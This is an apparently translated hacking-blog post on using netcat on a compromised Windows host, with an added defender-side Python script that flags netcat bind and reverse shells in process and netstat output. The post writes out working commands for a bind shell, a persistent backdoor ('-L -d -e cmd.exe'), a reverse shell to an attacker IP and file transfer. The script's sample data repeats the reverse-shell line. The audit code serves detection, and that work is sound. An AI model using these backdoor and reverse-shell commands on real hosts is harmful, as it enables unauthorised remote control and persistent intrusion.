Some ways of using nc after a host has been compromised
Tip: the software can be downloaded from http://down.51cto.com/data/1982508
1. Port listening; can be used together with sfind
sfind -p port ip tests whether the port is being listened on;
nc -vv -l -p port listens on the port locally;
2. Build a simple remote shell
The remote host runs nc -l -p port -t -e cmd.exe (-t: answer Telnet negotiation so a telnet client can connect; -e: the program whose input and output are redirected to the connection).
The local machine can then log in directly with telnet remote-ip port.
3. Establish a long-term backdoor
The remote host runs nc -L -p port -d -e cmd.exe (-L: keep listening after a client disconnects; -d: detach from the console); everything else is the same as in 2.
4. Reverse connection: bind the remote host's cmd shell to a local port
Local IP: 192.168.1.6; remote IP: 192.168.72.143
On the remote host, bind its cmd shell to a port on the local machine's IP;
Listen locally on the bound port; the remote host (the compromised machine, the "broiler") connects back automatically;
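Sections 2, 3 and 4 all leave the same traces on the compromised host: an nc.exe process whose command line carries -l/-L and/or -e cmd.exe, and a socket that process owns in netstat. The following defender-side audit script is an added example, not code from the original post or from the nc project: it parses command-line and netstat output in the shape of wmic process get CommandLine,ProcessId and netstat -ano, classifies each netcat instance as a bind shell (section 2/3), a reverse shell (section 4) or a plain listener (section 1/5), and correlates it with the socket rows for its PID. The sample output, the function names (classify, audit) and the Finding record are all constructed for this example.

```python
"""Hypothetical defender-side audit for netcat listeners and reverse shells.
Samples below are constructed for this example, not captured from a real host."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample, shaped like "wmic process get CommandLine,ProcessId" output.
PROCESS_SAMPLE = """\
CommandLine                                   ProcessId
C:\\Windows\\system32\\svchost.exe -k netsvcs  812
C:\\tools\\nc.exe -L -p 4444 -d -e cmd.exe     2240
nc.exe 192.168.1.6 5555 -e cmd.exe            2316
C:\\tools\\nc.exe -vv -l -p 8080               2388
C:\\Windows\\explorer.exe                      1604
"""

# Constructed sample, shaped like "netstat -ano" output (TCP rows only).
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2240
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       2388
  TCP    192.168.72.143:49712   192.168.1.6:5555       ESTABLISHED     2316
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       812
"""

NC_NAMES = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe", "sh", "bash"}


@dataclass
class Finding:
    pid: int
    kind: str            # bind_shell | reverse_shell | listener | client
    persistent: bool     # -L: nc re-listens after every disconnect (Windows nc)
    sockets: List[str]   # netstat rows owned by this PID, "local->foreign STATE"
    cmdline: str


def basename(path: str) -> str:
    """Last path component, tolerant of both slash styles, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_processes(text: str) -> List[Tuple[int, str]]:
    """Return (pid, command line) pairs; the PID is the last token on each row."""
    rows = []
    for line in text.splitlines():
        parts = line.rsplit(None, 1)
        if len(parts) == 2 and parts[1].isdigit():
            rows.append((int(parts[1]), parts[0].strip()))
    return rows


def parse_netstat(text: str) -> Dict[int, List[Tuple[str, str, str]]]:
    """Map PID -> [(local, foreign, state)] for TCP rows."""
    sockets: Dict[int, List[Tuple[str, str, str]]] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP" and parts[4].isdigit():
            _, local, foreign, state, pid = parts
            sockets.setdefault(int(pid), []).append((local, foreign, state))
    return sockets


def classify(cmdline: str) -> Optional[Tuple[str, bool]]:
    """Return (kind, persistent) for a netcat command line, or None if it is not netcat."""
    tokens = cmdline.split()
    if not tokens or basename(tokens[0]) not in NC_NAMES:
        return None
    args = tokens[1:]
    listening = any(a in ("-l", "-L") for a in args)
    persistent = "-L" in args
    # -e <program>: the program whose stdin/stdout are wired to the socket
    exec_target = next((args[i + 1] for i, a in enumerate(args[:-1]) if a == "-e"), None)
    spawns_shell = exec_target is not None and basename(exec_target) in SHELLS
    if listening and spawns_shell:
        kind = "bind_shell"        # section 2/3 pattern: nc -l/-L -p port -e cmd.exe
    elif spawns_shell:
        kind = "reverse_shell"     # section 4 pattern: connects out and hands over a shell
    elif listening:
        kind = "listener"          # section 1/5 pattern: plain port listener / file sink
    else:
        kind = "client"
    return kind, persistent


def audit(process_text: str, netstat_text: str) -> List[Finding]:
    """Correlate netcat command lines with the sockets their PIDs own."""
    sockets = parse_netstat(netstat_text)
    findings = []
    for pid, cmdline in parse_processes(process_text):
        result = classify(cmdline)
        if result is None:
            continue
        kind, persistent = result
        rows = [f"{loc}->{rem} {st}" for loc, rem, st in sockets.get(pid, [])]
        findings.append(Finding(pid, kind, persistent, rows, cmdline))
    return findings


if __name__ == "__main__":
    for f in audit(PROCESS_SAMPLE, NETSTAT_SAMPLE):
        flag = " (persistent)" if f.persistent else ""
        print(f"PID {f.pid}: {f.kind}{flag}  {f.cmdline}")
        for row in f.sockets:
            print("    ", row)
```

On a real host the two sample strings would be replaced by the captured output of the two commands; the correlation by PID is what distinguishes the bind shell from section 3 (a LISTENING socket on the -p port) from the reverse shell of section 4 (an ESTABLISHED socket to the attacker's IP and port, with no -l at all). Renamed copies of nc.exe would not match NC_NAMES, so the -e plus shell check is the more durable of the two signals.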
5. Establish a data pipe and transfer files
The compromised host starts listening on a port and redirects whatever it receives into a file;
Locally, read the file to be transferred and send it to that port;
Transfer succeeded; simple and cheap;
6. Other uses, such as building a honeypot, grabbing a system service port before the real service does, port scanning and so on: there is better software for these, and a follow-up post will cover them ~
This article is from the "Nocturnal Person" blog; please keep this source: http://zerosecurity.blog.51cto.com/9913090/1613252
Hacking weapon: NC in practice (Windows edition)